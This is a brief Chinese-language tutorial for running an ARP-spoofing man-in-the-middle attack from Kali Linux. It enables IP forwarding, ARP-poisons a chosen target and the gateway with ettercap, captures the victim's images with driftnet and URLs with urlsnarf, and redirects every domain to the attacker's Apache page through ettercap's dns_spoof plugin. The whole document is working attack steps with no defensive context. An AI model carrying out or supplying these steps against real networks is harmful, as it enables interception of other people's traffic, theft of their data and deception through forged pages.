1. 在/etc/sysctl.conf的配置文件中,修改变量net.ipv4.ip_forward的值为 1,把前面的 # 去掉;若此变量没有,那就添加,
net.ipv4.ip_forward=1
2. 下载ettercap
apt-get install ettercap
使用图像界面ettercap -G
3. ettercap -G 启动
sniffing at startup 开启
primary interface 选择wlan0
点击右上角√
4. 开始ARP中间人模式
点击 scan for hosts 开启扫描本网段存活主机
点击 hosts list 查看扫出的存活主机
添加目标ip -------> add to Target1
添加网关ip -------> add to Target2
MITM menu----->ARP poisoning----->Sniff remote connections---->ok
到这里ARP欺骗已完成,下面需要进行抓取数据,图片,日志等。
5. 获取图片信息---->driftnet -i wlan0 -a -d /root/arp/file
-a -d j静态保存到/root/arp/file目录中
监听网页日志---->urlsnarf -i wlan0
抓 包------------>wireshark
6. 篡改网页信息(dns污染)
firstone!!!打开apache2服务,
0.service apache2 start
1.vim /etc/ettercap/etter.dns
2. * A 192.168.43.107------->(这里是kali的ip)
3.vim /var/www/html/index.html
4.点击Plugins选择插件,选择dns_spoof,双击确定。